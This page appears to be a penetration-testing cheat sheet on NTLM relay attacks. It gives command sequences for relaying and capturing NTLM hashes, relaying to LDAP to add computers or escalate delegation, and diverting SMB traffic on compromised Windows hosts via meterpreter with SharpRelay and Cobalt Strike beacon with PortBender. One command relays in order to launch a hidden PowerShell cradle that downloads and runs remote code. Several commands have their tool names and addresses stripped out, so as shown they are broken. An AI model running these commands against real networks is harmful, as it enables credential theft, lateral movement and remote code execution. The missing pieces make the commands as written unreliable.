Comment on page

NTLM Relay

Lateral Movement using Credentials Relaying (taso_x).pdf
Generate relay list with CME and enumerate local admins when relaying:
$ cme smb --gen-relay-list relay.txt
$ -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
Relay & catch hashes (via multi-relay):
$ -smb2support -port 8445 share `pwd`
$ -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
The easier way though is to use the combination of -of/--output-file hashes.txt -ntlmchallenge 1122334455667788 options to save the hash with a predefined challenge to a file while relaying.
Relay NTLM2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP must be Off):
$ -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./ -I eth0 -wd -P -v


$ python MEGACORP/snovvcrash:'Passw0rd!'@
$ python -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'

Relaying on Windows

meterpreter + SharpRelay

Divert incoming SMB traffic from Victim to Attacker's local 445 port through an elevated meterpreter session and relay it to Target via MSF SOCKS server.
1. Add a static route to the Target through the 1st meterpreter session:
meterpreter > route add 1
2. Start MSF SOCKS server:
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST
msf auxiliary(server/socks_proxy) > run -j
3. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:
meterpreter > portfwd add -R -L -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
4. Relay the diverted traffic to Target through SOCKS:
$ sudo proxychains4 -q -t smb:// -smb2support
When ran once, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)

beacon + PortBender

Set SOCKS server & port forwarding, upload WinDivert driver and configure redirection with PortBender:
beacon> socks 1080
beacon> rportfwd 8445 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
Relay the planet:
$ sudo proxychains4 -q -t smb:// -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"\")"'
Stop PortBender:
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>
Last modified 7mo ago